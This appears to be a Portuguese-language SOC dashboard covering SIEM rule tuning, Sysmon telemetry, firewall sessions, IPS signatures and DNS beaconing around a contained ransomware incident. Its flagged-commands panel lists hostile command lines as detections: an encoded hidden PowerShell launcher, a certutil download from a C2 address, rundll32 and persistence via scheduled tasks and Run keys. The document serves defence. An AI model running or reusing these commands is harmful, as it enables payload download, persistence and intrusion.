Grupo Vetria / Segurança & SOC / Regras & Tuning SIEM
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Tabelão de Regras · console do ruleset

wzh-mgr-01/02 · /var/ossec/etc/rules/ · 3.428 regras · 186 vet-* · 41 em tuning · ord. hits 24h
visão salva: fila_triagemrule.level>=10 AND NOT rule.groups=fp_reviewíndice wazuh-alerts-4.x-* · 206/214 fontes ok · atraso máx 38 s
rule.iddescrição · contexto do último matchlvlmitrehits 24htend. 24hfp %p50estado
vet-100021
4625 burst >50/5 min por srcip → vpn-forti-01
96 rajadas · srcip 203.0.113.44/.51 · filho de 60122 · dispara PB-03
L12 T1110 18.442 4,1% 0,9 ms ATIVA
60122
4625 · falha de logon — usuário ou senha inválidos
base win_authentication_failed · 6 DCs · pico 1.208/h · 03h10
L10 T1110.003 18.442 2,2% 0,6 ms ATIVA
5710
sshd: tentativa de login com usuário inexistente
face de gestão 10.20.8.0/28 · sondas a cada 60 s no ruído · TK-30455
L7 T1110 14.882 44,6% 0,5 ms TUNING
5712
sshd: força bruta — 8 falhas em 120 s
srv-bkp-01 · srv-arq-01 · proposta: threshold 12/120 s (TK-30301)
L10 T1110.001 1.204 11,8% 0,7 ms TUNING
vet-100052
Kerberos 4769 com cifra RC4 (0x17) p/ SPN em watch
3 SPNs: svc-protheus · svc-nfe · svc-arquivos · suspeita kerberoasting
L12 T1558.003 312 6,1% 1,4 ms ATIVA
92032
Sysmon EID1: LOLBin com linha de comando ofuscada
pai explorer.exe · flags -enc / -nop / ^ · 610 hosts da fábrica no escopo
L12 T1218 61 18,4% 3,1 ms TUNING
vet-100047
DNS: domínio novo com DGA-score > 0,8
41M consultas/24h · entropia >3,9 + feed MISP · TTL 300 · 12 domínios
L13 T1071.004 12 8,3% 4,2 ms ATIVA
vet-100008
7045: serviço novo fora de janela de GMUD
só srv-* · ImagePath fora de C:\Windows\System32\ · 6 eventos/24h
L11 T1543.003 6 33,3% 1,1 ms TUNING
31151
web: rajada de 404 — varredura em portal-vetria
silenciada 12/07 · TK-30219 · era 2.408/dia · monitor externo no ruído
L10 T1595.003 0 61,2% SILENCIADA
vet-100034
sequência: powershell -enc -nop → rundll32 (EID1→EID3)
último match qui 17/07 14h09 · wks-fab-104 · sha256 9f2a71…c44b → EV-2026-0142
L14 T1059.001 0 0,0% 2,8 ms ATIVA · 0142
decisão do plantão: Douglas M. assume o tuning de 31151 + 5710 nesta semana · TK-30455 · entra na GMUD do SIEM sáb 26/07 22h · aprova: Renata C.

Pipeline de Avaliação · wazuh-analysisd

wzh-mgr-01 (master) · wzh-mgr-02 (worker) · p50 por estágio · 24h
COLETA · 4.200 AGENTES + SYSLOG/NETFLOW 1,02B eventos/dia · 11,8k EPS méd pico 23,4k EPS · 02h backup + varredura · razão 1,98× 98,2% decodificados · 1,8% sem decoder → archives.json (18,4M/dia) PRÉ-DECODE + DECODE 1.912 decoders · p50 0,8 ms/evento sem decoder não vira alerta: auditoria mensal · TK-30417 · Yasmin R. 100% avaliados no motor · 8 threads/nó · match hierárquico MOTOR DE REGRAS 3.428 regras · p50 2,1 ms · 186 vet-* · 41 em tuning 3,1% com match → 31,4M eventos indexados/dia GARGALO · 02h04–02h31 fila analysisd wzh-mgr-01: 0,4 s normal 38 ms · EPS 23,4k TK-30390 · reescalonar backup CORRELAÇÃO · REGRAS COMPOSTAS 214 compostas · janela 60–600 s · if_matched_sid 0,0013% dos indexados viram alerta de triagem ALERTAS → FILA 413 /dia · 12,4k/mês rule.level ≥ 10 → mesa de triagem (EV-01) 347 hoje · MTTA 4,2 min wazuh 4.9 · queue 131072 · uso máx 61% · 02h12 0 descartes em 24h largura ∝ log₁₀ do volume/dia
fila analysisd sem descarte em 24h · alarme se uso > 85% · dono da plataforma: Túlio B. · TK-30390 aberto p/ janela de backup

Top Ruído × Top Valor · 30 dias

alertas por regra × desfecho dos 218 casos · ITSM · FP% no fechamento
TOP RUÍDO · CANDIDATAS A TUNINGFP%
31151404 em massa · portal-vetria61,2%
causa: monitor externo (2 IPs) · TK-30219 · Douglas M.
5710ssh usuário inexistente44,6%
causa: sondas de gestão 60 s · TK-30455 · Douglas M.
vet-1000087045 fora de GMUD33,3%
causa: agente de patch WSUS · TK-30470 · Aline F.
92032LOLBin ofuscado18,4%
causa: instalador NSIS assinado · TK-30482 · Túlio B.
5712força bruta sshd11,8%
causa: threshold 8/120 s baixo · TK-30301 · Marcos P.
TOP VALOR · GEROU CASO CONFIRMADOvínculo
vet-100034ps -enc → rundll32EV-2026-0142
ransomware contido · MTTC 42 min · qui 17/07 14h05
vet-100021burst 4625 por srcipEV-0137
password spray · bloqueio preventivo · 1h50 p/ conter
vet-100047DGA / beaconing DNSCS-2199
beacon confirmado (0142) + 2 em análise · CS-2205
60122falha de logon · 4625EV-0129
credencial válida reutilizada · contida em 9 min
vet-100052RC4 p/ SPN · 4769CS-2181
kerberoasting: 3 SPNs em watch · rotação de senha em GMUD
critério VALOR: caso confirmado vinculado no ITSM · critério RUÍDO: % fechado como FP · revisão quinzenal do ruleset — próx. sex 01/08

Distribuição de Alertas por Level

wazuh-alerts-4.x-* · terms rule.level · 24h · y: alertas/24h · log₁₀
10⁶10⁴10²10⁰
zona de triagem · rule.level ≥ 10Σ = 347 · alertas de hoje na fila
18,2M
6,4M
4,8M
1,6M
284k
96k
22k
208
82
43
11
3
0
3456789101112131415

Cobertura MITRE do Ruleset

rule.mitre.tactic · 3.428 regras · ruleset de 20/07
Acesso Inicial246T1566 · 64
Execução402T1059 · 96
Persistência342T1543 · 71
Esc. de Privilégio204T1055 · 38
Evasão de Defesa388T1218 · 84
Credenciais486T1110 · 118
Descoberta232T1046 · 52
Mov. Lateral218T1021 · 66
Coleta156T1005 · 31
Comando & Controle298T1071 · 88
Exfiltração132T1048 · 29
Impacto124T1486 · 42
3.228 de 3.428 mapeadas · 200 sem rule.mitre.id (backlog TK-30501 · Yasmin R.) · T1110 concentra 118 regras

Fila de Tuning · semana 29

41 em tuning · 6 nesta semana · GMUD sáb 26/07 22h
regramotivo do ajustefp% antes→depoisdonoprazo
31151whitelist do monitor externo (2 IPs)61,2% 8%Douglas M.seg 21/07
5710ignorar sondas 10.20.8.0/2844,6% 12%Douglas M.ter 22/07
vet-100008correlacionar 7045 com GMUD aberta33,3% 5%Aline F.qua 23/07
92032exceção p/ assinaturas NSIS válidas18,4% 6%Túlio B.qua 23/07
5712threshold 8 → 12 falhas/120 s11,8% 7%Marcos P.qui 24/07
vet-100019beacon: excluir CDNs do feed MISP9,4% 3%Yasmin R.sex 25/07
janela de mudança do SIEM: sáb 26/07 22h–00h · rollback automático se alerta/h desviar >30% · aprova: Renata C.
Wazuh 4.9 · cluster wzh-mgr-01/02 · 3.428 regras (186 custom) · 1.912 decoders · janela 24h · Grupo Vetria · dom 20/07 15:12
EV-07 · 7 de 17
Grupo Vetria / Segurança & SOC / Telemetria Sysmon
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Rio de Eventos Sysmon · 24h por Event ID

Sysmon v15 config v4.1 → Wazuh agent → wzh-mgr-01/02 · 14,5M ev/24h · méd 168 EPS
EID 3 · rede 5,1M EID 22 · DNS 3,6M EID 1 · processo 2,4M EID 11 · arquivo 1,8M EID 13 · registro 920k EID 7 · imagem 640k EID 10 · acesso proc. 84k empilhado · milhões de eventos/h
2,0 M/h1,51,00,50
14,5Meventos Sysmon · 24h
4.037 agentes reportando
pico 1,97M ev/h · 02h30 ≈ 546 EPS
backup (svc-backup · fita 02h) + varredura
full-scan EDR · dom 03h · EID 7/10 ↑
vale 0,31M ev/h · 05h30
domingo · expediente reduzido · platô 0,58M ev/h · fábrica em turno
15h12 ▾ agora
00h04h08h12h16h20h24h
✎ silhueta = 7 EIDs habilitados na config v4.1 · sem deriva vs baseline 7d (+2,3%) · EID 5/17/18 desabilitados por ruído — tuning TK-29984 · dona: Renata C.

Parent → Child fora do baseline · EID 1

Wazuh rules vet-* (186 custom) · baseline 30d por par · 8 pares em watch
processo pai → filho · regra30 d24hbase 30dΔhostsveredito
winword.exepowershell.exe
vet-1042 · nível 12 · pai Office + filho shell + flag -enc
3
0,1/d
+30×
wks-fab-104 · -109 EV-2026-0142 · qui 17/07
BLOQUEADO
excel.execmd.exe
vet-1043 · nível 10 · macro XLM → shell
1
0,3/d
+3,3×
wks-fab-107 · macro de planilha fiscal
EM ANÁLISE
outlook.exewscript.exe
vet-1045 · nível 10 · anexo → script host
1
0,2/d
+5×
wks-fab-112 · .js em anexo zip
EM ANÁLISE
services.exerundll32.exe
vet-1048 · nível 8 · serviço novo → LOLBin (correlato 7045)
2
1,8/d
+11%
dc-mtz-01 · srv-arq-01
EM ANÁLISE
w3wp.execmd.exe
vet-1046 · nível 14 · canário de webshell · DMZ
0
0/d
=
portal-vetria · zero é o esperado
ESPERADO
mshta.exe*
vet-1047 · nível 12 · HTA negado por ASR D4F940AB-401B
0
0/d
=
frota toda · política ASR em bloqueio
ESPERADO
explorer.exepowershell.exe
vet-1049 · nível 5 · scripts de logon GPO · assinados
214
189/d
+13%
61 hosts · matriz + fábrica em turno
ESPERADO
wmiprvse.execmd.exe
vet-1050 · nível 5 · inventário SCCM · janela 12h/12h
38
34/d
+12%
22 hosts · coleta das 12h
ESPERADO
✎ par 01: EDR mata o filho pós-spawn (engine de comportamento) e o EID 1 registra · ASR "Office → filho" passa a bloqueio na GMUD-4471 · qua 23/07 · TK-30398 · dono: Douglas M.

Top Comandos Sinalizados · EID 1

EDR + vet-* · 23 detecções/24h · comportamento 11 · assinatura 8 · ML 4
powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0…BLOQUEADO
3 exec·wks-fab-104 · -109·vet-1042·sha256 9f2a71…c44b·hash 1/8 do EV-0142
rundll32.exe C:\Users\Public\upd.dll,StartBLOQUEADO
2 exec·wks-fab-104·vet-1044 · DLL não assinada em path de usuário·hash 2/8
certutil.exe -urlcache -split -f http://203.0.113.88/a.txtEM ANÁLISE
1 exec·srv-arq-01·vet-1051 · LOLBin download·correlaciona c/ ALR-8846 (SMB)
wmic.exe process call create "cmd /c whoami /all"EM ANÁLISE
2 exec·wks-fab-107·vet-1053 · recon local pós-macro·mesma origem do par excel→cmd
schtasks.exe /create /tn WinUpdt /tr C:\Users\Public\upd.exe /sc onlogonBLOQUEADO
1 exec·wks-fab-112·vet-1061 · persistência·correlato 4698 (11 tasks novas/24h)
reg.exe add HKCU\…\CurrentVersion\Run /v upd /d C:\Users\Public\upd.exeEM ANÁLISE
1 exec·wks-fab-112·vet-1060 · RunKey via EID 13 (920k/24h)·TK-30419
✎ quarentena: 7 arquivos/24h · 34 exclusões ativas — 3 arriscadas em revisão · TK-30388 · dona: Aline F.

DNS do Endpoint · EID 22

3,6M ev/24h · 214 domínios <30d · 12 DGA > 0,8 · corp 41M cons/24h
domínio resolvido fora do proxycons 24hidadeHdgaveredito
kz4hj2n8-pay[.]top
resolve 203.0.113.88 · C2 do EV-0142
412
4d
3,94
0,94
BLOQUEADO
cdn-updt7[.]xyz
beacon Δt 60s ±2s · wks-fab-109
118
11d
3,58
0,86
EM ANÁLISE
mx-relay-brz[.]info
beacon Δt 300s · srv-mail-01
96
22d
3,31
0,71
EM ANÁLISE
api-clima-jdi[.]com.br
estação IoT da fábrica · painel OT
1.204
2a
2,88
0,22
ESPERADO
time.windows.com
NTP direto · 388 hosts
38,4k
2,41
0,04
ESPERADO
wpad.vetria.corp
NXDOMAIN legado · GPO pendente
8,4k
2,10
0,02
ESPERADO
✎ beaconing: 1 confirmado (EV-0142 · bloqueado) + 2 em análise · FFT janela 6h · TK-30421 · dono: Túlio B.

Integridade da Telemetria

wzh-mgr-01/02 cluster · 3.428 regras · 186 vet-* · 41 em tuning · 1.912 decoders
agentes reportando
4.037/4.112
98,2% · p95 6s · p50 1,8s
sem reporte >24h
75
62 filiais · 13 matriz
sem sysmon
12 +76 rollout
Win7 legado · VLAN OT
eventos 24h
14,5M
méd 168 · pico 546 EPS
sysmonconfig-vetria-v4.1.xml · sha256 b7e4c2…91af · 74 regras include/exclude · assinada 14/07 · GPO GPO-SEC-14
EID habilitados: 1 · 3 · 7 · 10 · 11 · 13 · 22 · exclusões: named pipes Protheus · 12 paths de build
15/07 09h14push v4.1 via GPO-SEC-14 → 3.988 ok · 37 aguardam reinícioATIVA
30/06 22h10v4.0 → exclui pipes do Protheus · −22% de ruído vs v3.9HISTÓRICO
02/06 21h40hotfix v3.9b → corrige EID 22 ausente no Server 2012 (srv-arq-01)HISTÓRICO
✎ 12 Win7 sem Sysmon: NDR compensa na VLAN OT · rollout dos 76 até 31/07 · TK-30401 · dono: infra endpoint
Sysmon v15 config v4.1 (custom) → Wazuh agent · 4.037 hosts · 14,5M eventos/24h · Grupo Vetria · dom 20/07 15:12
EV-08 · 8 de 17
Grupo Vetria / Segurança & SOC / SESSÕES DE FIREWALL
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Tail de Sessões — o que atravessa a borda agora

syslog fgt-mtz-01 (traffic-forward) → Wazuh · enriquecido: GeoIP · feed TI · JA3 · R-163 com tráfego vivo
▸ filtro:action!=permit OR policyid IN (163,141) OR watch=true · últimos 90 s128,0k sessões ativas · 2.410 novas/s · syslog 4,1k msg/s
horaorigemdestinoprotopolicyaçãoaplicaçãobytes ↑ ↓duraçãogeoenriquecimento · decisão
15:12:03 203.0.113.201:4487310.20.30.40:8443 TCPR-163PERMIT SSL/TLSv1.2 18,4 KB 122,7 KB 00:04:11BR poro órfão 2019 · dst fora do inventário · cert autoassinado CN=upd-portal · fechar: GMUD 2299 (ter 22/07) · TK-30401
15:12:02 203.0.113.44:60112203.0.113.2:3389 TCPR-141DENY RDP 60 B 0 B 00:00:00BR spray desde 03h10 · pico 1.208/h · par .51 mesmo padrão · watchlist TI · correlação com 4625 em vpn-forti-01
15:12:02 10.20.61.104:49331203.0.113.74:8443 TCPR-198DENY SSL (JA3) 517 B 0 B 00:00:00US wks-fab-104 · beacon 300 s ±2 · JA3 51c64c77…9e2b · ALR-8841 em análise · Douglas M. · prazo 15h40
15:12:01 10.20.2.11:55214198.51.100.20:443 TCPR-029PERMIT NFe-SOAP/TLS 2,1 MB 684 KB 00:00:41BR srv-erp-01 → SEFAZ-SP · autorização NF-e · crítico p/ faturamento (R$ 138k/h) · fluxo fixado
15:11:59 192.0.2.77:5102310.20.30.21:443 TCPR-012PERMIT HTTPS/H2 214 KB 1,8 MB 00:02:19BR cliente B2B → portal-vetria via vip-portal-443 · health 2/2 UP · 4,2M sessões/24h
15:11:58 203.0.113.99:*10.20.30.21:443 TCPR-012RATE-LIM HTTPS 40 B 0 B 00:00:00 SYN sem ACK · syn-cookie ativo · 1,2k half-open agora · ver painel de estados · residual do scan 02h04
15:11:57 198.51.100.23:5060203.0.113.2:5060 UDPR-000DENY SIP 424 B 0 B 00:00:00NL scanner SIP (OPTIONS) · 2,1k/h · deny implícita · nenhum serviço SIP publicado na borda
15:11:56 10.20.1.10:40112198.51.100.53:53 UDPR-031PERMIT DNS 1,1 KB 4,3 KB 00:00:00US dc-mtz-01 → forwarder · só DCs saem em 53 · demais hosts: sinkhole R-208 · 41M consultas/24h
15:11:55 203.0.113.117:44001203.0.113.2:23 TCPR-009DENY Telnet 60 B 0 B 00:00:00CN SYN scan 1–1024 · 74% do deny CN nas 24h · geo-block ativo desde a GMUD 1980
15:11:54 10.20.2.40:5182010.30.8.20:9401 TCPR-077PERMIT Veeam-Repl 412,3 GB 1,9 GB 13:07:22 srv-bkp-01 → DR nuvem · aberta 02h04 · elefante nº 1 das 24h · shaping classe bulk 40% fora da janela 01h–04h
15:11:52 10.34.8.9:33012203.0.113.2:443 TCPR-003DENY 60 B 0 B 00:00:00 bogon RFC1918 chegando na wan1 · ttl=64 · anti-spoof · 44/h · upstream notificado TK-30395
15h09 · Túlio B.: fechar R-163 na GMUD 2299 (ter 22/07 22h) · aprovação pendente: infra-web · TK-30401 — mitigação até lá: watchlist TI no 203.0.113.201 + captura pcap 15 min anexada ao ticket

Top Talkers · 24 h

NetFlow fgt-mtz-01 → Wazuh · total borda 1,08 TB
srv-bkp-01dr-nuvem (10.30.8.20)
Veeam-Repl38,2%janela 01h–04h
412,3 GBda banda 24h
srv-arq-01dc-spo-01
SMB/DFS-R11,0%
118,4 GBreplicação DFS
portal-vetriaclientes B2B (inbound)
HTTPS/H29,0%
96,7 GB4,2M sessões
srv-mail-01MTAs externos
SMTP/TLS3,8%
41,2 GB84k sessões
srv-wsus-01CDN Microsoft
MS-Update3,6%sync dom 14h · em curso
38,9 GBcatálogo + pacotes
dc-mtz-01dc-jdi-01
AD-Repl RPC/4452,1%
22,4 GBintra-site VPN
guest-wifistreaming (10.20.90.0/24)
QUIC/4431,7%shaping 20 Mbps
18,7 GBclasse guest
srv-erp-01SEFAZ-SP (198.51.100.20)
NFe-SOAP0,9%
9,8 GBvolume baixo · crítico
top-8 = 70,3% do total · shaping bulk 40% fora da janela — GMUD 2278 · dono: infra-redes

Estado & Protocolo

conntrack fgt-mtz-01 · 128,0k ativas
estados agoralargura ∝ log₁₀
TCP ESTABLISHED75,3%96,4k
UDP assoc14,2%18,2k
TCP TIME_WAIT/FIN7,7%9,8k
Túneis ESP/GRE1,2%1,5k
TCP SYN_RECV (half-open)scan 02h04 · rate-limit1,2k
ICMP0,7%0,9k
novas sessões por segundo · 24 hfgt-mtz-01
6,0k/s3,0k/s0
2.410/snovas agora · 15h12
02h04 · 6,1k/s SYN scan · TK-30388 ▸
03h10 · bump spray RDP
15h19h23h03h07h11h15h12
half-open normal <400 · 1,2k é residual do scan 02h04 · syn-cookie confirmado por Marcos P. 08h15 · sem ação pendente

NAT & Pools

SNAT/PAT + VIPs · fgt-mtz-01 · 64,5k portas/IP
pools snat · uso de portas (PAT)
snat-corp203.0.113.10–.11
61%
79,9k/131,0k
estável · headroom ok
snat-guest203.0.113.12 · 1 IP
83%
54,4k/65,5k
exaure ~19h hoje · TK-30427
snat-vpn203.0.113.15 · 1 IP
34%
22,3k/65,5k
estável
snat-fab-ot203.0.113.14 · 1 IP
12%
7,9k/65,5k
só janela GMUD
vips publicados · health-check 5 s
vip-portal-443203.0.113.6:443 → 10.20.30.21:443
2/2 UP · 4,2M/24hpersist: cookie
vip-mail-25203.0.113.6:25 → 10.20.30.28:25
1/1 UP · 84k/24h
vip-vpnssl-10443203.0.113.5:10443 → vpn-forti-01
UP · alvo do spray4625 pico 03h10
snat-guest 83% às 15h12 · alarme em 85% · proposta: +1 IP no pool — GMUD 2301 (qua 23/07) · dono: infra-redes

Deny Storms · top origens

deny/h · 24 h · GeoIP + feed TI
203.0.113.117GEO-BLOCK4,4k/h
AS65501 CN · SYN scan portas 1–1024 · constante nas 24 h
198.51.100.23DENY IMPLÍCITA2,1k/h
AS65517 NL bulletproof · SIP OPTIONS 5060/5061 · rajadas
203.0.113.44WATCHLIST TI341/h
AS65530 · spray RDP → vpn-forti-01 (3389/10443) · pico 1.208/h 03h10
203.0.113.51WATCHLIST TI214/h
AS65530 · mesmo /24 do .44 · sincronizado · pico 986/h 03h10
10.34.8.9ANTI-SPOOF44/h
bogon RFC1918 na wan1 · ttl=64 · upstream notificado · TK-30395
R-141 (deny+log RDP) criada 18/07 · GMUD 2291 · dono: infra-redes — 203.0.113.88 (C2 do EV-0142): 0 hits há 62h · IOC block válido
FortiGate fgt-mtz-01 (HA) syslog → Wazuh · 214 policies · 128,0k sessões ativas · amostra 90 s · Grupo Vetria · dom 20/07 15:12
EV-09 · 9 de 17
Grupo Vetria / Segurança & SOC / IPS & Assinaturas
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Matriz Assinatura × Hora — o que bate na porta

fgt-mtz-01/02 → syslog → Wazuh · type=utm subtype=ips action IN (dropped,detected) · 24h
Eventos IPS · 24h12.34811.960 drop · 388 alert p/ SIEM
Ritmo agora · 15h12512/hmédia 24h 514/h · dom −8% vs sáb
Críticos triados1411 Citrix Bleed · 3 DNS tunnel
Cluster 02h–04h34%4.229 ev em 3h · origem 203.0.113.0/24
2,0k1,5k1,0k0,5k0
ev/h · bin 1h
pico 1.879 ev/h · 03h · varredura coordenada 203.0.113.0/24
cluster 02h–04h · 4.229 ev · 34% do dia
▾ agora · 512 ev/h
média 24h · 514 ev/h
00h04h08h12h16h20h23h
assinatura · regra
00
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15▾
16
17
18
19
20
21
22
23
24h
ação
alvo típico
ET SCAN Nmap -sS
SID 2000537 · ET SCAN
96
104
238
325
212
141
98
88
112
126
131
138
121
109
134
141
122
118
104
96
89
84
118
139
3.184
drop
fgt-mtz-01borda · todas portas
RDP brute-force
SID 2023753 · ET POLICY MS-RDP
64
71
456
512
398
104
52
41
46
52
58
61
48
44
57
61
52
49
44
41
38
36
49
58
2.492
drop
vpn-forti-01TCP 3389 · spray /24
SQLi UNION SELECT genérico
SID 2006445 · ET WEB_SERVER
41
38
64
71
58
49
52
66
98
112
118
121
104
98
116
128
108
102
88
72
64
52
71
95
1.986
drop
portal-vetriaTCP 443 · /busca
Log4Shell ${jndi: probe
SID 2034647 · CVE-2021-44228
34
41
186
338
142
52
31
28
34
38
41
44
36
31
39
44
38
34
31
28
26
24
31
37
1.408
drop
portal-vetriaheaders HTTP
PHPUnit RCE
SID 2025731 · CVE-2017-9841
28
31
138
158
71
38
24
22
28
31
34
36
31
28
34
38
31
29
26
24
22
20
28
34
984
drop
portal-vetria/vendor/phpunit
ThinkPHP RCE
SID 2026731 · ET WEB_SPECIFIC
22
24
74
176
61
31
19
18
22
26
28
31
26
22
28
31
26
24
21
19
17
16
22
28
812
drop
portal-vetria/index.php?s=
SMBGhost scan
SID 2029994 · CVE-2020-0796
18
21
52
128
44
26
16
14
17
19
21
22
19
17
21
23
19
18
16
14
13
12
17
21
608
drop
borda mtzTCP 445 · fechado
PAN-OS GlobalProtect cmd inj
SID 2051156 · CVE-2024-3400
14
16
41
112
34
19
12
11
14
16
17
18
15
13
16
18
15
14
12
11
10
9
13
16
486
drop
borda mtzsem PAN-OS
Citrix Bleed
SID 2049097 · CVE-2023-4966 11 crit
·
6
31
44
26
9
·
·
6
8
9
11
8
6
12
14
8
6
·
·
·
·
·
·
234
alert
adc-ctx-01DMZ · TCP 443
DNS tunnel suspect (iodine)
SID 2027757 · ET POLICY DNS 3 crit
·
·
12
15
12
·
·
·
6
7
8
9
7
6
9
14
7
6
·
·
·
·
·
6
154
alert
saída DNSNULL/TXT · >52 chars
drop · sem alvo interno alvo em análise alvo presente alert · investigação heat normalizado por linha · célula <6 ev = «·» · 15▾ = agora
✎ decisão do plantão: 2049097 (Citrix Bleed) em alert até o patch do adc-ctx-01 — VU-2214 · GMUD-1189 qui 24/07 22h · dono: infra-redes · Túlio B. revalida pós-GMUD

Funil do Sensor · pacote → veredito

fgt-mtz-01/02 · IPS inline (fail-close) · janela 24h
9,4 Gbpsinspecionado inline
≈ 101 TB no dia · pico 9,8 Gbps · 02h04
12.348matches · 24h
11.960drop na borda
388
alert → Wazuh SIEM
14críticos triados
▸ 1 match a cada ≈8,2 GB
96,9% morre na borda
3,1% vira alert
3,6% dos alerts
decisão por pacote: p50 42 µs · p99 118 µs
bypass/fail-open 24h: 0 · fail-close armado
drop não vira caso: só os 388 alert entram na fila do SIEM · dos 14 críticos, 11 são Citrix Bleed (tabela abaixo)

Tentativas × Exposição — temos o alvo?

IPS × inventário de vulns · scanner qui 22h · 1.842 CVEs abertos · KEV 17
assinatura · CVE24htent.temos o alvo?veredito · vínculo
Citrix Bleed
SID 2049097 · CVE-2023-4966
234
SIM · ALVO PRESENTEadc-ctx-01 · 13.1-49.13
PRIORIDADE
VU-2214 · patch GMUD-1189 · qui 24/07 22h
Log4Shell ${jndi: probe
SID 2034647 · CVE-2021-44228
1.408
EM ANÁLISE2 apps legadas Java
VALIDANDO
TK-30455 · SCA srv-arq-01 · resp. qua 23/07
RDP brute-force
SID 2023753 · ET POLICY MS-RDP
2.492
NÃORDP não exposto · NLA
RUÍDO NA BORDA
spray 4625 · 203.0.113.44/.51 · ver EV-04
PHPUnit RCE
SID 2025731 · CVE-2017-9841
984
NÃOportal-vetria é stack .NET
RUÍDO
sem PHP exposto · drop mantido · custo zero
SMBGhost scan
SID 2029994 · CVE-2020-0796
608
NÃO445/TCP fechado na borda
RUÍDO
fechado 05/2020 · regra R-089
PAN-OS GlobalProtect cmd inj
SID 2051156 · CVE-2024-3400
486
NÃOsem PAN-OS no parque
RUÍDO
no catálogo KEV · varredura oportunista
ruído ≠ desligar: drop na borda custa zero · Aline F. revê o threshold do 2034647 quando TK-30455 fechar

Pacotes & Performance do Sensor

fgt-mtz-01 ativo · HA a-p c/ fgt-mtz-02 · SNMP + REST · 60 s
Throughput inspec.9,4 Gbpspico 9,8 · 02h04 · full-inspect
Sessões simultâneas214,6knovas 8,4k/s · limite 2,0M
CPU engine IPS34%p95 61% às 02h · 16 cores NP7
Latência inline42 µsp50 · p99 118 µs · budget 500 µs
Bypass / fail-open024h · teste de HA: GMUD-1142 ✓
Assinaturas ativas9.4128.978 alert · 434 drop alta conf.
pacote ET Pro: sáb 19/07 23h14 ✓ · +38 novas · 12 revisadas · 3 depreciadas · próxima ~21h (diário)EM DIA
IPS FortiGate inline + regras ET Pro · 9.412 assinaturas · 12,3k eventos/24h · update diário · Grupo Vetria · dom 20/07 15:12
EV-10 · 10 de 17
Grupo Vetria / Segurança & SOC / DNS & Egress
POSTURA: ATENÇÃO1 incidente ativo · 28 na fila
15:12 · dom 20/07·Wazuh SIEM · FortiGate · AD VETRIA.CORP·30 s ↻AO VIVO

Dispersão Entropia × Frequência · domínios consultados

dns.log dc-jdi-01/02 · dc-spo-01 + Sysmon EID 22 (3,6M/24h) → Wazuh
»query: rule.group=dns AND (entropy(qname) ≥ 3,8 OR first_seen < 30d) AND NOT allowlist·12,6M consultas externas · 12,4k qnames únicos · 1 ponto = 1 domínio
ZONA DGA entropia > 3,8 · 12 domínios 10⁶ 10⁵ 10⁴ 10³ 10² 10 1 consultas / 24 h · log₁₀ 0 0,5 1,0 1,5 2,0 2,5 3,0 3,5 4,0 4,5 entropia de Shannon do qname · bits por caractere massa corporativa · 12,4k domínios únicos · p95 entropia 3,1 CDN/SaaS conhecidos · allowlist AL-07 outros 11 DGA · score > 0,8 < 40 consultas · sinkhole 10.20.99.99 41M consultas DNS · 24 h · 12,6M externas plotadas 214 domínios <30 d · 12 DGA > 0,8 · 3 beacons vivos zona interna VETRIA.CORP excluída do plot · 28,4M xj3k9f[.]top entropia 4,2 · 1.204 consultas · DGA 0,94 resolvia p/ 203.0.113.88 · IP novo hoje: .74 BLOQUEADO sinkhole 10.20.99.99 · 17/07 14h47 · EV-0142 cdn-metrics[.]io beacon 60,0 s exato · jitter 0,2% · 1.440 consultas/24h origem srv-mail-01 (DMZ) · destino 198.51.100.23:443 EM ANÁLISE · TK-30467 1 de 2 em análise atualizacao-vetria[.]com typosquat de vetria.com.br · 84 consultas · registro 14/07 (6 d) MX + A ativos · entropia baixa — invisível p/ regra de DGA EM ANÁLISE · TK-30461 takedown pedido ao registrador categorizado corporativo cauda não categorizada DGA / IOC typosquat beacon
✎ xj3k9f[.]top no sinkhole 10.20.99.99 desde 17/07 14h47 · bloqueio do IP novo (.74) replicado nas 38 filiais 15h09 (PB-03) · TK-30455 · Douglas M.

Beaconing · Regularidade de Saída

NetFlow fgt-mtz-01 + Sysmon EID 3 → regra vet-100482
»vet-100482: stddev(Δt)/avg(Δt) < 0,01 AND stddev(bytes_out) < 64 B AND n ≥ 200 · 24h
hostdestinopulso 24hΔt médjitterbytes/req1ª vezveredito
wks-fab-104
fábrica Jundiaí · OT
203.0.113.74:8443
infra EV-0142 · IP .88→.74
300,0 s
σ 1,2 s
0,4%
1.184 B
σ 12 B
hoje
14h40
C2 · ALR-8841IP bloq 14h52 · PB-03
srv-mail-01
DMZ · SMTP
cdn-metrics[.]io
198.51.100.23:443 · TLS
60,0 s
σ 0,1 s
0,2%
642 B
σ 4 B
14/07
03h22
EM ANÁLISETK-30467 · Aline F.
pdv-fil07-03
filial 07 · PDV
telemetria-sync[.]net
198.51.100.77:443 · TLS
120,0 s
σ 1,0 s
0,8%
512 B
σ 18 B
hoje
09h14
EM ANÁLISETK-30474 · Yasmin R.
4.037 hosts
frota · agente NTP
a.st1.ntp.br
200.160.7.186:123 · UDP
64,0 s
σ 2,2 s
3,4%
90 B
σ 0 B
baseline
> 1 ano
LEGÍTIMONTP.br · allowlist
frota EDR
4.112 instalados
tlm.edr-cloud[.]com
198.51.100.9:443 · TLS
300,0 s
σ 15 s
5,1%
2,1 KB
σ 340 B
baseline
> 1 ano
LEGÍTIMOtelemetria AV · AL-19
srv-erp-01
DC JDI · Protheus
lic.protheus-upd[.]com
200.201.10.44:443 · TLS
900,0 s
σ 24 s
2,7%
1,4 KB
σ 96 B
12/03
GMUD 2044
LEGÍTIMOatualizador ERP
decisão do plantão: se TK-30467/30474 não fecharem até 18h00, destinos entram no sinkhole — aprovação Renata C. · legítimos documentados na AL-19

Consultas Raras · NXDOMAIN & TXT

dns.log · qtype TXT/NX · Sysmon EID 22 · PB-13
8.412NXDOMAIN · 24hpico 642/h · 02h10
